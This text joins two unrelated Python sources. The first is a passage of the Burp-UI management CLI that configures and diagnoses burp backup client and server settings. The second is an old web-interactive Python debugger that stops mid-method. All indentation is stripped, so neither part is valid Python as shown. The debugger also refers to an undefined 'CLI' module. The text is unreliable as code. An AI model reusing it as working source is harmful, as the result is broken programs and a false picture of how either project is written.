"Unable to activate redis & celery. Did you ran the "
"'pip install burp-ui[celery]' and "
"'pip install burp-ui[gunicorn-extra]' commands first?"
)
if database:
try:
from .ext.sql import db # noqa
if (
"database" not in app.conf.options["Production"]
or "database" in app.conf.options["Production"]
and app.conf.options["Production"]["database"] != database
) and app.database != database:
app.conf.options["Production"]["database"] = database
app.conf.options.write()
app.conf._refresh(True)
except ImportError:
warn(
"It looks like some dependencies are missing. Did you ran "
"the 'pip install \"burp-ui[sql]\"' command first?"
)
if dry:
temp = app.conf.options.filename
app.conf.options.filename = orig
after = []
try:
if not os.path.exists(temp) or os.path.getsize(temp) == 0:
after = conf_orig
else:
with open(temp) as fil:
after = fil.readlines()
os.unlink(temp)
except:
pass
diff = difflib.unified_diff(
conf_orig, after, fromfile=orig, tofile="{}.new".format(orig)
)
out = ""
for line in diff:
out += _color_diff(line)
if out:
click.echo_via_pager(out)
if dry and monitor:
temp = monconf.options.filename
monconf.options.filename = mon_orig
after = []
try:
if not os.path.exists(temp) or os.path.getsize(temp) == 0:
after = monconf_orig
else:
with open(temp) as fil:
after = fil.readlines()
os.unlink(temp)
except:
pass
diff = difflib.unified_diff(
monconf_orig, after, fromfile=mon_orig, tofile="{}.new".format(mon_orig)
)
out = ""
for line in diff:
out += _color_diff(line)
if out:
click.echo_via_pager(out)
bconfcli = (
bconfcli
or app.conf.options["Burp"].get("bconfcli")
or getattr(app.client, "burpconfcli")
)
bconfsrv = (
bconfsrv
or app.conf.options["Burp"].get("bconfsrv")
or getattr(app.client, "burpconfsrv")
)
dest_bconfcli = bconfcli
is_burp_2_2_10_plus = False
listen_opt = "status_address"
if server_version and server_version >= BURP_LISTEN_OPTION:
is_burp_2_2_10_plus = True
listen_opt = "listen_status"
_, restore_port = listen.split(":")
if not os.path.exists(bconfcli):
clitpl = f"""
mode = client
port = {restore_port}
status_port = 4972
server = ::1
password = abcdefgh
cname = {client}
protocol = 1
pidfile = /tmp/burp.client.pid
syslog = 0
stdout = 1
progress_counter = 1
network_timeout = 72000
server_can_restore = 0
cross_all_filesystems=0
ca_burp_ca = /usr/sbin/burp_ca
ca_csr_dir = /etc/burp/CA-client
ssl_cert_ca = /etc/burp/ssl_cert_ca-client-{client}.pem
ssl_cert = /etc/burp/ssl_cert-bui-client.pem
ssl_key = /etc/burp/ssl_cert-bui-client.key
ssl_key_password = password
ssl_peer_cn = burpserver
include = /home
exclude_fs = sysfs
exclude_fs = tmpfs
nobackup = .nobackup
exclude_comp=bz2
exclude_comp=gz
"""
if dry:
(_, dest_bconfcli) = tempfile.mkstemp()
with open(dest_bconfcli, "w") as confcli:
confcli.write(clitpl)
parser = app.client.get_parser(assume)
confcli = Config(dest_bconfcli, parser, "srv")
confcli.set_default(dest_bconfcli)
confcli.parse()
if confcli.get("cname") != client:
confcli["cname"] = client
if confcli.get("server") != host:
confcli["server"] = host
c_status_port = (
confcli.get("status_port", [4972])[0]
if confcli.version >= BURP_BIND_MULTIPLE
else confcli.get("status_port", 4972)
)
c_server_port = (
confcli.get("port", [4971])[0]
if confcli.version >= BURP_BIND_MULTIPLE
else confcli.get("port", 4971)
)
if c_server_port != restore_port:
confcli["port"] = [restore_port]
if confcli.dirty:
if dry:
(_, dstfile) = tempfile.mkstemp()
else:
dstfile = bconfcli
confcli.store(conf=bconfcli, dest=dstfile, insecure=True)
if dry:
before = []
after = []
try:
with open(bconfcli) as fil:
before = fil.readlines()
except:
pass
try:
with open(dstfile) as fil:
after = fil.readlines()
os.unlink(dstfile)
except:
pass
if dest_bconfcli != bconfcli:
# the file did not exist
os.unlink(dest_bconfcli)
before = []
diff = difflib.unified_diff(
before, after, fromfile=bconfcli, tofile="{}.new".format(bconfcli)
)
out = ""
for line in diff:
out += _color_diff(line)
if out:
click.echo_via_pager(out)
if not os.path.exists(bconfsrv):
err("Unable to locate burp-server configuration, aborting!")
sys.exit(1)
confsrv = Config(bconfsrv, parser, "srv")
confsrv.set_default(bconfsrv)
confsrv.parse()
bind_index = -1
if host not in ["::1", "127.0.0.1"]:
bind = confsrv.get(listen_opt)
if is_burp_2_2_10_plus:
bind_list = list(bind)
for idx, line in enumerate(bind_list):
if line.endswith(":{}".format(c_status_port)):
bind = line.split(":")[0]
bind_index = idx
break
else:
warn(
"Unable to locate a 'listen_status' associated to your client "
"'status_port' ({})".format(c_status_port)
)
if (bind and bind not in [host, "::", "0.0.0.0"]) or not bind:
warn(
"It looks like your burp server is not exposing it's "
"status port in a way that is reachable by Burp-UI!"
)
info(
"You may want to set the '{0}' setting with "
"either '{1}{3}', '::{3}' or '0.0.0.0{3}' in the {2} file "
"in order to make Burp-UI work".format(
listen_opt,
host,
bconfsrv,
":{}".format(c_status_port) if is_burp_2_2_10_plus else "",
)
)
MAX_STATUS_CHILDREN = pool if pool is not None else 15
if not is_burp_2_2_10_plus:
s_port = confsrv.get("port", [4971])
if restore_port not in s_port:
confsrv["port"] = restore_port
else:
s_listen = confsrv.get("listen", [])
if listen not in s_listen:
confsrv["listen"] = listen
status_port = confsrv.get("status_port", [4972])
do_warn = False
if "max_status_children" not in confsrv:
info(
"We need to set the number of 'max_status_children'. "
"Setting it to {}.".format(MAX_STATUS_CHILDREN)
)
confsrv["max_status_children"] = MAX_STATUS_CHILDREN
elif confsrv.version and confsrv.version < BURP_BIND_MULTIPLE:
max_status_children = confsrv.get("max_status_children")
if not max_status_children or max_status_children < MAX_STATUS_CHILDREN:
confsrv["max_status_children"] = MAX_STATUS_CHILDREN
do_warn = True
else:
max_status_children = confsrv.get("max_status_children", [])
if not is_burp_2_2_10_plus:
for idx, value in enumerate(status_port):
if value == c_status_port:
bind_index = idx
break
if bind_index >= 0 and len(max_status_children) >= bind_index:
if max_status_children[bind_index] < MAX_STATUS_CHILDREN:
confsrv["max_status_children"][bind_index] = MAX_STATUS_CHILDREN
do_warn = True
else:
if max_status_children[-1] < MAX_STATUS_CHILDREN:
confsrv["max_status_children"][-1] = MAX_STATUS_CHILDREN
do_warn = True
if do_warn:
warn(
"We need to raise the number of 'max_status_children' to {}.".format(
MAX_STATUS_CHILDREN
)
)
if "restore_client" not in confsrv:
confsrv["restore_client"] = client
else:
restore = confsrv.getlist("restore_client")
if client not in restore:
confsrv["restore_client"].append(client)
confsrv["monitor_browse_cache"] = True
ca_client_dir = confsrv.get("ca_csr_dir")
if ca_client_dir and not os.path.exists(ca_client_dir):
try:
os.makedirs(ca_client_dir)
except IOError as exp:
_log(
'Unable to create "{}" dir: {}'.format(ca_client_dir, exp),
color="yellow",
err=True,
)
if confsrv.dirty:
if dry:
(_, dstfile) = tempfile.mkstemp()
else:
dstfile = bconfsrv
confsrv.store(conf=bconfsrv, dest=dstfile, insecure=True)
if dry:
before = []
after = []
try:
with open(bconfsrv) as fil:
before = fil.readlines()
except:
pass
try:
with open(dstfile) as fil:
after = fil.readlines()
os.unlink(dstfile)
except:
pass
diff = difflib.unified_diff(
before, after, fromfile=bconfsrv, tofile="{}.new".format(bconfsrv)
)
out = ""
for line in diff:
out += _color_diff(line)
if out:
click.echo_via_pager(out)
if confsrv.get("clientconfdir"):
bconfagent = os.path.join(confsrv.get("clientconfdir"), client)
else:
warn(
'Unable to find "clientconfdir" option, you will have to '
"setup the agent by your own"
)
bconfagent = os.devnull
if not os.path.exists(bconfagent):
agenttpl = """
password = abcdefgh
"""
if not dry:
with open(bconfagent, "w") as confagent:
confagent.write(agenttpl)
else:
before = []
after = ["{}\n".format(x) for x in agenttpl.splitlines()]
diff = difflib.unified_diff(
before, after, fromfile="None", tofile=bconfagent
)
out = ""
for line in diff:
out += _color_diff(line)
if out:
click.echo_via_pager(out)
else:
confagent = Config(bconfagent, parser, "cli")
confagent.set_default(bconfagent)
confagent.parse()
if confagent.get("password") != confcli.get("password"):
warn(
"It looks like the passwords in the {} and the {} files "
"mismatch. Burp-UI will not work properly until you fix "
"this".format(bconfcli, bconfagent)
)
@app.cli.command()
@click.option(
"-c",
"--client",
default="bui",
help="Name of the burp client that will be used by Burp-UI " '(defaults to "bui")',
)
@click.option(
"-h",
"--host",
default="::1",
help='Address of the status server (defaults to "::1")',
)
@click.option("-t", "--tips", is_flag=True, help="Show you some tips")
def diag(client, host, tips):
"""Check Burp-UI is correctly setup."""
if app.config["BACKEND"] not in ["burp2", "parallel"]:
err("Sorry, you can only diag the 'burp2' and the 'parallel' backends")
sys.exit(1)
if not app.config["STANDALONE"]:
err("Sorry, only the standalone mode is supported")
sys.exit(1)
try:
msg = app.load_modules()
except Exception as e:
msg = str(e)
if msg:
_die(msg, "diag")
from .misc.backend.utils.constant import BURP_LISTEN_OPTION
from .misc.parser.utils import Config
from .app import get_redis_server
if "Production" in app.conf.options and "redis" in app.conf.options["Production"]:
try:
# detect missing modules
import redis as redis_client # noqa
import celery # noqa
import socket
rhost, rport, _ = get_redis_server(app)
ret = -1
for res in socket.getaddrinfo(
rhost, rport, socket.AF_UNSPEC, socket.SOCK_STREAM
):
if ret == 0:
break
af, socktype, proto, _, sa = res
try:
s = socket.socket(af, socktype, proto)
except socket.error:
continue
try:
ret = s.connect_ex(sa)
except:
continue
if ret != 0:
warn("Unable to contact the redis server, disabling it")
except ImportError:
warn(
"Unable to activate redis & celery. Did you ran the "
"'pip install \"burp-ui[celery]\"' and "
"'pip install \"burp-ui[gunicorn-extra]\"' commands first?"
)
if (
"Production" in app.conf.options
and "database" in app.conf.options["Production"]
):
try:
from .ext.sql import db # noqa
except ImportError:
warn(
"It looks like some dependencies are missing. Did you ran "
"the 'pip install \"burp-ui[sql]\"' command first?"
)
section = "Burp"
if not app.conf.section_exists(section):
warn("Section [Burp] not found, looking for the old [Burp2] section instead.")
section = "Burp2"
if not app.conf.section_exists(section):
err("No [Burp*] section found at all!", err=False)
section = "Burp"
bconfcli = app.conf.options.get(section, {}).get("bconfcli") or getattr(
app.client, "burpconfcli"
)
bconfsrv = app.conf.options.get(section, {}).get("bconfsrv") or getattr(
app.client, "burpconfsrv"
)
try:
app.client.status()
except Exception as e:
if "Unable to spawn burp process" in str(e):
try:
app.client._spawn_burp(verbose=True)
except Exception as e:
msg = str(e)
else:
msg = str(e)
if msg:
err(msg, err=False)
if "could not connect" in msg:
warn(
"It looks like your burp-client can not reach your "
"burp-server. Please check both your 'server' setting in "
"your '{}' file and 'status_address' in your '{}' "
"file.".format(bconfcli, bconfsrv)
)
c_status_port = 4972
errors = False
if os.path.exists(bconfcli):
try:
parser = app.client.get_parser()
confcli = Config(bconfcli, parser, "srv")
confcli.set_default(bconfcli)
confcli.parse()
c_status_port = confcli.get("status_port", [4972])[0]
if confcli.get("cname") != client:
warn(
"The cname of your burp client does not match: "
"{} != {}".format(confcli.get("cname"), client)
)
errors = True
if confcli.get("server") != host:
warn(
"The burp server address does not match: "
"{} != {}".format(confcli.get("server"), host)
)
errors = True
except BUIserverException as exc:
err(str(exc))
errors = True
else:
err("No client conf file found: {} does not exist".format(bconfcli))
errors = True
if os.path.exists(bconfsrv):
try:
is_burp_2_2_10_plus = False
listen_opt = "status_address"
server_version = app.client.get_server_version()
if server_version and server_version >= BURP_LISTEN_OPTION:
is_burp_2_2_10_plus = True
listen_opt = "listen_status"
parser = app.client.get_parser()
confsrv = Config(bconfsrv, parser, "srv")
confsrv.set_default(bconfsrv)
confsrv.parse()
bind_index = -1
if host not in ["::1", "127.0.0.1"]:
bind = confsrv.get(listen_opt)
if is_burp_2_2_10_plus:
bind_list = list(bind)
for idx, line in enumerate(bind_list):
if line.endswith(":{}".format(c_status_port)):
bind = line.split(":")[0]
bind_index = idx
break
else:
warn(
"Unable to locate a 'listen_status' associated to your client "
"'status_port' ({})".format(c_status_port)
)
if (bind and bind not in [host, "::", "0.0.0.0"]) or not bind:
warn(
"It looks like your burp server is not exposing it's "
"status port in a way that is reachable by Burp-UI!"
)
info(
"You may want to set the '{0}' setting with "
"either '{1}{3}', '::{3}' or '0.0.0.0{3}' in the {2} file "
"in order to make Burp-UI work".format(
listen_opt,
host,
bconfsrv,
":{}".format(c_status_port) if is_burp_2_2_10_plus else "",
)
)
errors = True
status_port = confsrv.get("status_port", [4972])
if "max_status_children" not in confsrv:
do_warn = True
else:
max_status_children = confsrv.get("max_status_children", [])
do_warn = False
if not is_burp_2_2_10_plus:
for idx, value in enumerate(status_port):
if value == c_status_port:
bind_index = idx
break
if bind_index >= 0 and len(max_status_children) >= bind_index:
if max_status_children[bind_index] < 15:
do_warn = True
else:
if max_status_children[-1] < 15:
do_warn = True
if do_warn:
info(
"'max_status_children' is to low, you need to set it to "
"15 or more. Please edit your {} file.".format(bconfsrv)
)
errors = True
restore = []
if "restore_client" in confsrv:
restore = confsrv.getlist("restore_client")
if client not in restore:
warn(
"Your burp client is not listed as a 'restore_client'. "
"You won't be able to view other clients stats!"
)
errors = True
if "monitor_browse_cache" not in confsrv or not confsrv.get(
"monitor_browse_cache"
):
warn(
"For performance reasons, it is recommended to enable the "
"'monitor_browse_cache'."
)
errors = True
ca_client_dir = confsrv.get("ca_csr_dir")
if ca_client_dir and not os.path.exists(ca_client_dir):
try:
os.makedirs(ca_client_dir)
except IOError as exp:
_log(
'Unable to create "{}" dir: {}'.format(ca_client_dir, exp),
color="yellow",
err=True,
)
if confsrv.get("clientconfdir"):
bconfagent = os.path.join(confsrv.get("clientconfdir"), client)
else:
warn(
'Unable to find "clientconfdir" option. Something is wrong '
"with your setup."
)
bconfagent = "ihopethisfiledoesnotexistbecauseitisrelatedtoburpui"
if not os.path.exists(bconfagent) and bconfagent.startswith("/"):
warn("Unable to find the {} file.".format(bconfagent))
errors = True
else:
confagent = Config(bconfagent, parser, "cli")
confagent.set_default(bconfagent)
confagent.parse()
if confagent.get("password") != confcli.get("password"):
warn(
"It looks like the passwords in the {} and the {} files "
"mismatch. Burp-UI will not work properly until you fix "
"this.".format(bconfcli, bconfagent)
)
except BUIserverException as exc:
err(str(exc))
errors = True
else:
err(
"Unable to locate burp-server configuration: {} does not "
"exist.".format(bconfsrv)
)
errors = True
if errors:
if not tips:
err(
"Some errors have been found in your configuration. "
"Please make sure you ran this command with the right flags! "
"(see --help for details)."
)
else:
info(
"\n"
"Well, if you are sure about your settings, you can run the "
"following command to help you setup your Burp-UI agent. "
"(Note, the '--dry' flag is here to show you the "
"modifications that will be applied. Once you are OK with "
"those, you can re-run the command without the '--dry' flag):"
)
log(
' > bui-manage setup-burp --host="{}" --client="{}" --dry'.format(
host, client
)
)
else:
ok(
"Congratulations! It seems everything is alright. Burp-UI "
"should run without any issue now.",
)
@app.cli.command()
@click.option(
"-v",
"--verbose",
is_flag=True,
help="Dump parts of the config (Please double check no sensitive" " data leaked)",
)
@click.option(
"-l", "--load", is_flag=True, help="Load all configured modules for full summary"
)
def sysinfo(verbose, load):
"""Returns a couple of system informations to help debugging."""
from .desc import __release__, __version__
import platform
msg = None
if load:
try:
msg = app.load_modules()
except Exception as e:
msg = str(e)
backend = app.config["BACKEND"]
colors = {
"True": "green",
"False": "red",
}
embedded_ws = str(app.config["WITH_WS"])
available_ws = str(WS_AVAILABLE)
log(
"Python version: {}.{}.{}".format(
sys.version_info[0], sys.version_info[1], sys.version_info[2]
)
)
log("Burp-UI version: {} ({})".format(__version__, __release__))
log(
"OS: {}:{} ({})".format(
platform.system(), platform.release(), os.name
)
)
if platform.system() == "Linux":
log("Distribution: {} {} {}".format(*platform.dist()))
log("Single mode: {}".format(app.config["STANDALONE"]))
log("Backend: {}".format(backend))
log(
"WebSocket embedded: {}".format(
click.style(embedded_ws, fg=colors[embedded_ws])
)
)
log(
"WebSocket available: {}".format(
click.style(available_ws, colors[available_ws])
)
)
log("Config file: {}".format(app.config.conffile))
if load:
if not app.config["STANDALONE"] and not msg:
log("Agents:")
for agent, obj in app.client.servers.items():
client_version = server_version = "unknown"
try:
app.client.status(agent=agent)
client_version = app.client.get_client_version(agent=agent)
server_version = app.client.get_server_version(agent=agent)
except BUIserverException:
pass
alive = obj.ping()
if alive:
status = click.style("ALIVE", fg="green")
else:
status = click.style("DISCONNECTED", fg="red")
log(" - {} ({})".format(agent, status))
log(" * client version: {}".format(client_version))
log(" * server version: {}".format(server_version))
elif not msg:
server_version = "unknown"
try:
app.client.status()
server_version = app.client.get_server_version()
except BUIserverException:
pass
log("Burp client version: {}".format(app.client.client_version))
log("Burp server version: {}".format(server_version))
if verbose:
log(">>>>> Extra verbose informations:")
err("!!! PLEASE MAKE SURE NO SENSITIVE DATA GET EXPOSED !!!", err=False)
sections = [
"WebSocket",
"Burp",
"Production",
"Global",
]
sections.reverse()
for section in sections:
if section in app.config.options:
log()
log(" 8<{}BEGIN[{}]".format("-" * (67 - len(section)), section))
for key, val in app.config.options.get(section, {}).items():
log(" {} = {}".format(key, val))
log(" 8<{}END[{}]".format("-" * (69 - len(section)), section))
if load and msg:
_die(msg, "sysinfo")
|
|
#!/usr/bin/python2.4
# -*- coding: us-ascii -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# $Id$
"""
Web-interactive Python debugger.
"""
import sys, os
import linecache
import bdb
import re
try:
from repr import Repr
except ImportError:
from reprlib import Repr
# Create a custom safe Repr instance and increase its maxstring.
# The default of 30 truncates error messages too easily.
_repr = Repr()
_repr.maxstring = 200
_repr.maxother = 50
_saferepr = _repr.repr
DebuggerQuit = bdb.BdbQuit
def find_function(funcname, filename):
cre = re.compile(r'def\s+%s\s*[(]' % funcname)
try:
fp = open(filename)
except IOError:
return None
# consumer of this info expects the first line to be 1
lineno = 1
answer = None
while 1:
line = fp.readline()
if line == '':
break
if cre.match(line):
answer = funcname, filename, lineno
break
lineno = lineno + 1
fp.close()
return answer
def lookupmodule(filename):
"""Helper function for break/clear parsing."""
root, ext = os.path.splitext(filename)
if ext == '':
filename = filename + '.py'
if os.path.isabs(filename):
return filename
for dirname in sys.path:
while os.path.islink(dirname):
dirname = os.readlink(dirname)
fullname = os.path.join(dirname, filename)
if os.path.exists(fullname):
return fullname
return None
def checkline(filename, lineno, ui):
"""Return line number of first line at or after input
argument such that if the input points to a 'def', the
returned line number is the first
non-blank/non-comment line to follow. If the input
points to a blank or comment line, return 0. At end
of file, also return 0."""
line = linecache.getline(filename, lineno)
if not line:
ui.Print('*** End of file')
return 0
line = line.strip()
# Don't allow setting breakpoint at a blank line
if (not line or (line[0] == '#') or
(line[:3] == '"""') or line[:3] == "'''"):
ui.Print('*** Blank or comment')
return 0
# When a file is read in and a breakpoint is at
# the 'def' statement, the system stops there at
# code parse time. We don't want that, so all breakpoints
# set at 'def' statements are moved one line onward
if line[:3] == 'def':
instr = ''
brackets = 0
while 1:
skipone = 0
for c in line:
if instr:
if skipone:
skipone = 0
elif c == '\\':
skipone = 1
elif c == instr:
instr = ''
elif c == '#':
break
elif c in ('"',"'"):
instr = c
elif c in ('(','{','['):
brackets = brackets + 1
elif c in (')','}',']'):
brackets = brackets - 1
lineno = lineno+1
line = linecache.getline(filename, lineno)
if not line:
ui.Print('*** end of file')
return 0
line = line.strip()
if not line: continue # Blank line
if brackets <= 0 and line[0] not in ('#','"',"'"):
break
return lineno
class Debugger(bdb.Bdb):
def reset(self):
bdb.Bdb.reset(self) # old style class
self.forget()
self._ui = WebUI()
def _expansions(self, c):
if c == "S": # current frame over total frames in backtrace
return "%s/%s" % (self.curindex+1, len(self.stack))
def forget(self):
self.lineno = None
self.stack = []
self.curindex = 0
self.curframe = None
def setup(self, f, t):
self.forget()
self.stack, self.curindex = self.get_stack(f, t)
self.curframe = self.stack[self.curindex][0]
# Override Bdb methods
def set_trace(self, frame=None, start=0):
"""Start debugging from `frame`, or `start` frames back from
caller's frame.
If frame is not specified, debugging starts from caller's frame.
"""
if frame is None:
frame = sys._getframe().f_back
self.reset()
if start:
start = int(start)
while start > 0 and frame:
frame = frame.f_back
start -= 1
while frame:
frame.f_trace = self.trace_dispatch
self.botframe = frame
frame = frame.f_back
self.set_step()
sys.settrace(self.trace_dispatch)
def user_call(self, frame, argument_list):
"""This method is called when there is the remote possibility
that we ever need to stop in this function."""
if self.stop_here(frame):
self._ui.printf('%g--Call--%N')
self.interaction(frame, None)
def user_line(self, frame):
"""This function is called when we stop or break at this line."""
self.interaction(frame, None)
def user_return(self, frame, return_value):
"""This function is called when a return trap is set here."""
frame.f_locals['__return__'] = return_value
self._ui.printf('%g--Return--%N')
self.interaction(frame, None)
def user_exception(self, frame, exc_tuple):
"""This function is called if an exception occurs,
but only if we are to stop at or just below this level."""
exc_type, exc_value, exc_traceback = exc_tuple
frame.f_locals['__exception__'] = exc_type, exc_value
if type(exc_type) == type(''):
exc_type_name = exc_type
else:
exc_type_name = exc_type.__name__
self.print_exc(exc_type_name, exc_value)
self.interaction(frame, exc_traceback)
# General interaction function
def interaction(self, frame, traceback):
self.setup(frame, traceback)
self.print_stack_entry(self.stack[self.curindex])
if self._parser is None:
cmd = DebuggerCommands(self._ui)
cmd._setup(self, "%GDebug%N:%S> ")
parser = DebuggerParser(cmd)
self._parser = parser
self._parser.interact()
self.forget()
def execline(self, line):
locals = self.curframe.f_locals
globals = self.curframe.f_globals
try:
code = compile(line + '\n', '<stdin>', 'single')
except:
t, v = sys.exc_info()[:2]
self._ui.printf('*** Could not compile: %%r%s%%N: %s' % (t, v))
else:
try:
exec(code, globals, locals)
except:
t, v = sys.exc_info()[:2]
self._ui.printf('*** %%r%s%%N: %s' % (t, v))
def go_up(self):
if self.curindex == 0:
return '*** Oldest frame'
self.curindex = self.curindex - 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
return None
def go_down(self):
if self.curindex + 1 == len(self.stack):
return '*** Newest frame'
self.curindex = self.curindex + 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
return None
def getval(self, arg):
return eval(arg, self.curframe.f_globals, self.curframe.f_locals)
def retval(self):
if '__return__' in self.curframe.f_locals:
return self.curframe.f_locals['__return__']
else:
return None
def defaultFile(self):
"""Produce a reasonable default."""
filename = self.curframe.f_code.co_filename
return filename
def lineinfo(self, identifier):
failed = (None, None, None)
# Input is identifier, may be in single quotes
idstring = identifier.split("'")
if len(idstring) == 1:
# not in single quotes
id = idstring[0].strip()
elif len(idstring) == 3:
# quoted
id = idstring[1].strip()
else:
return failed
if id == '':
return failed
parts = id.split('.')
# Protection for derived debuggers
if parts[0] == 'self':
del parts[0]
if len(parts) == 0:
return failed
# Best first guess at file to look at
fname = self.defaultFile()
if len(parts) == 1:
item = parts[0]
else:
# More than one part.
# First is module, second is method/class
f = lookupmodule(parts[0])
if f:
fname = f
item = parts[1]
answer = find_function(item, fname)
return answer or failed
# Print a traceback starting at the top stack frame.
# The most recently entered frame is printed last;
# this is different from dbx and gdb, but consistent with
# the Python interpreter's stack trace.
# It is also consistent with the up/down commands (which are
# compatible with dbx and gdb: up moves towards 'main()'
# and down moves towards the most recent stack frame).
def print_stack_trace(self):
try:
for frame_lineno in self.stack:
self.print_stack_entry(frame_lineno)
except KeyboardInterrupt:
pass
def print_stack_entry(self, frame_lineno):
frame, lineno = frame_lineno
if frame is self.curframe:
self._ui.Print(self._ui.format('%I>%N'), None)
else:
self._ui.Print(' ', None)
self._ui.Print(self.format_stack_entry(frame_lineno))
self.lineno = None
def format_stack_entry(self, frame_lineno):
frame, lineno = frame_lineno
filename = self.canonic(frame.f_code.co_filename)
s = []
s.append(self._ui.format("%%y%s%%N(%%Y%r%%N) in " % (filename, lineno)))
if frame.f_code.co_name:
s.append(frame.f_code.co_name)
else:
s.append("<lambda>")
if '__args__' in frame.f_locals:
args = frame.f_locals['__args__']
s.append(_saferepr(args))
else:
s.append('()')
if '__return__' in frame.f_locals:
rv = frame.f_locals['__return__']
s.append(self._ui.format('%I->%N'))
s.append(_saferepr(rv))
line = linecache.getline(filename, lineno)
if line:
s.append("\n ")
s.append(line.strip())
return "".join(s)
def print_exc(self, ex, val):
uif = self._ui.format
self._ui.Print(uif('%R'), ex, uif('%N:'), str(val))
class DebuggerCommands(CLI.BaseCommands):
def _setup(self, obj, prompt=None):
self._dbg = obj # the debugger object
self._obj = obj # for base class
if prompt:
self._environ["PS1"] = str(prompt)
self._reset_scopes()
def finalize(self):
self._dbg.set_quit()
def default_command(self, argv):
line = " ".join(argv)
self._dbg.execline(line)
def execute(self, argv):
"""execute <statement>
Execute <statement> in current frame context."""
line = " ".join(argv[1:])
self._dbg.execline(line)
def brk(self, argv):
"""brk [-t] [breakpoint] ([file:]lineno | function) [, condition]
With a line number argument, set a break there in the current
file. With a function name, set a break at first executable line
of that function. Without argument, list all breaks. If a second
argument is present, it is a string specifying an expression
which must evaluate to true before the breakpoint is honored.
The line number may be prefixed with a filename and a colon,
to specify a breakpoint in another file (probably one that
hasn't been loaded yet). The file is searched for on sys.path;
the .py suffix may be omitted."""
temporary = False
opts, longopts, args = self.getopt(argv, "t")
for opt, arg in opts:
if opt == "-t":
temporary = True
if not args:
if self._dbg.breaks: # There's at least one
self._print("Num Type Disp Enb Where")
for bp in bdb.Breakpoint.bpbynumber:
if bp:
bp.bpprint()
return
# parse arguments; comma has lowest precedence
# and cannot occur in filename
arg = " ".join(args)
filename = None
lineno = None
cond = None
comma = arg.find(',')
if comma > 0:
# parse stuff after comma: "condition"
cond = arg[comma+1:].lstrip()
arg = arg[:comma].rstrip()
# parse stuff before comma: [filename:]lineno | function
colon = arg.rfind(':')
if colon >= 0:
filename = arg[:colon].rstrip()
f = lookupmodule(filename)
if not f:
self._print('*** ', repr(filename), 'not found from sys.path')
return
else:
filename = f
arg = arg[colon+1:].lstrip()
try:
lineno = int(arg)
except ValueError as msg:
self._print('*** Bad lineno:', arg)
return
else:
# no colon; can be lineno or function
try:
lineno = int(arg)
except ValueError:
try:
func = eval(arg,
self._dbg.curframe.f_globals,
self._dbg.curframe.f_locals)
except:
func = arg
try:
if hasattr(func, 'im_func'):
func = func.im_func
code = func.func_code
lineno = code.co_firstlineno
filename = code.co_filename
except:
# last thing to try
(ok, filename, ln) = self._dbg.lineinfo(arg)
if not ok:
self._print('*** The specified object', repr(arg))
self._print('is not a function or was not found along sys.path.')
return
lineno = int(ln)
if not filename:
filename = self._dbg.defaultFile()
# Check for reasonable breakpoint
line = checkline(filename, lineno, self._ui)
if line:
# now set the break point
err = self._dbg.set_break(filename, line, temporary, cond)
if err:
self._print('***', err)
else:
bp = self._dbg.get_breaks(filename, line)[-1]
self._print("Breakpoint %d at %s:%d" % (bp.number, bp.file, bp.line))
def enable(self, argv):
"""enable bpnumber [bpnumber ...]
Enables the breakpoints given as a space separated list of
bp numbers."""
for i in argv[1:]:
try:
i = int(i)
except ValueError:
self._print('Breakpoint index %r is not a number' % i)
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
self._print('No breakpoint numbered', i)
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.enable()
def disable(self, argv):
"""disable bpnumber [bpnumber ...]
Disables the breakpoints given as a space separated list of
bp numbers."""
for i in argv[1:]:
try:
i = int(i)
except ValueError:
self._print('Breakpoint index %r is not a number' % i)
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
self._print('No breakpoint numbered', i)
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.disable()
def condition(self, argv):
"""condition bpnumber str_condition
str_condition is a string specifying an expression which
must evaluate to true before the breakpoint is honored.
If str_condition is absent, any existing condition is removed;
i.e., the breakpoint is made unconditional."""
bpnum = int(argv[1].strip())
try:
cond = argv[2]
except:
cond = None
bp = bdb.Breakpoint.bpbynumber[bpnum]
if bp:
bp.cond = cond
if not cond:
self._print('Breakpoint', bpnum, 'is now unconditional.')
def ignore(self, argv):
"""ignore bpnumber count
Sets the ignore count for the given breakpoint number. A breakpoint
becomes active when the ignore count is zero. When non-zero, the
count is decremented each time the breakpoint is reached and the
breakpoint is not disabled and any associated condition evaluates
to true."""
bpnum = int(argv[1].strip())
try:
count = int(argv[2].strip())
except:
count = 0
bp = bdb.Breakpoint.bpbynumber[bpnum]
if bp:
bp.ignore = count
if count > 0:
reply = 'Will ignore next '
if count > 1:
reply = reply + '%d crossings' % count
else:
reply = reply + '1 crossing'
self._print(reply + ' of breakpoint %d.' % bpnum)
else:
self._print( 'Will stop next time breakpoint', bpnum, 'is reached.')
def clear(self, argv):
"""clear ...
Three possibilities, tried in this order:
clear -> clear all breaks, ask for confirmation
clear file:lineno -> clear all breaks at file:lineno
clear bpno bpno ... -> clear breakpoints by number
With a space separated list of breakpoint numbers, clear
those breakpoints. Without argument, clear all breaks (but
first ask confirmation). With a filename:lineno argument,
clear all breaks at that line in that file.
Note that the argument is different from previous versions of
the debugger (in python distributions 1.5.1 and before) where
a linenumber was used instead of either filename:lineno or
breakpoint numbers."""
if len(argv) == 1:
reply = self._ui.yes_no('Clear all breaks? ')
if reply:
self._dbg.clear_all_breaks()
return
arg = " ".join(argv[1:])
if ':' in arg:
# Make sure it works for "clear C:\foo\bar.py:12"
i = arg.rfind(':')
filename = arg[:i]
arg = arg[i+1:]
try:
lineno = int(arg)
except:
err = "Invalid line number (%s)" % arg
else:
err = self._dbg.clear_break(filename, lineno)
if err:
self._print('***', err)
return
numberlist = arg.split()
for i in numberlist:
err = self._dbg.clear_bpbynumber(i)
if err:
self._print('***', err)
else:
self._print('Deleted breakpoint %s ' % (i,))
def where(self, argv): # backtrace
"""where
Print a stack trace, with the most recent frame at the bottom.
An arrow indicates the "current frame", which determines the
context of most commands. 'bt' is an alias for this command."""
self._dbg.print_stack_trace()
def up(self, argv):
"""up
Move the current frame one level up in the stack trace
(to a newer frame)."""
res = self._dbg.go_up()
if res:
self._print(res)
self._reset_namespace()
def down(self, argv):
"""down
Move the current frame one level down in the stack trace
(to an older frame)."""
res = self._dbg.go_down()
if res:
